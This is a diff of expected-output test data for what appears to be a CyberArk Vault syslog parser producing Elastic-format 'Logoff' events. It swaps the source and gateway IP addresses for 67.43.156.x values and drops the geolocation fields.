@@ -877,8 +806,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904260500Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:48:28\",\"IsoTimestamp\":\"2021-03-11T17:48:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:37:11.641154800Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:28\",\"IsoTimestamp\":\"2021-03-11T17:48:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -902,20 +831,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -935,7 +852,7 @@ "PSMPGW_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -943,8 +860,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:49:06Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "PSMPGW_VAGRANT", 
@@ -957,8 +874,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904261900Z", - "original": "\u003c5\u003e1 2021-03-11T17:49:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:49:06\",\"IsoTimestamp\":\"2021-03-11T17:49:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641159200Z", + "original": "\u003c5\u003e1 2021-03-11T17:49:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:49:06\",\"IsoTimestamp\":\"2021-03-11T17:49:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -982,17 +899,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1012,7 +920,7 @@ "Administrator" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -1020,8 +928,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:20Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", 
@@ -1034,8 +942,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904263300Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:20\",\"IsoTimestamp\":\"2021-03-14T12:57:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641164600Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:20\",\"IsoTimestamp\":\"2021-03-14T12:57:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -1059,33 +967,12 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1108,8 +995,8 @@ "Administrator" ], "ip": [ - "81.32.170.205", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -1117,9 +1004,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T13:49:36Z", - "gateway_station": "34.71.250.247", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", 
@@ -1132,8 +1019,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904264500Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
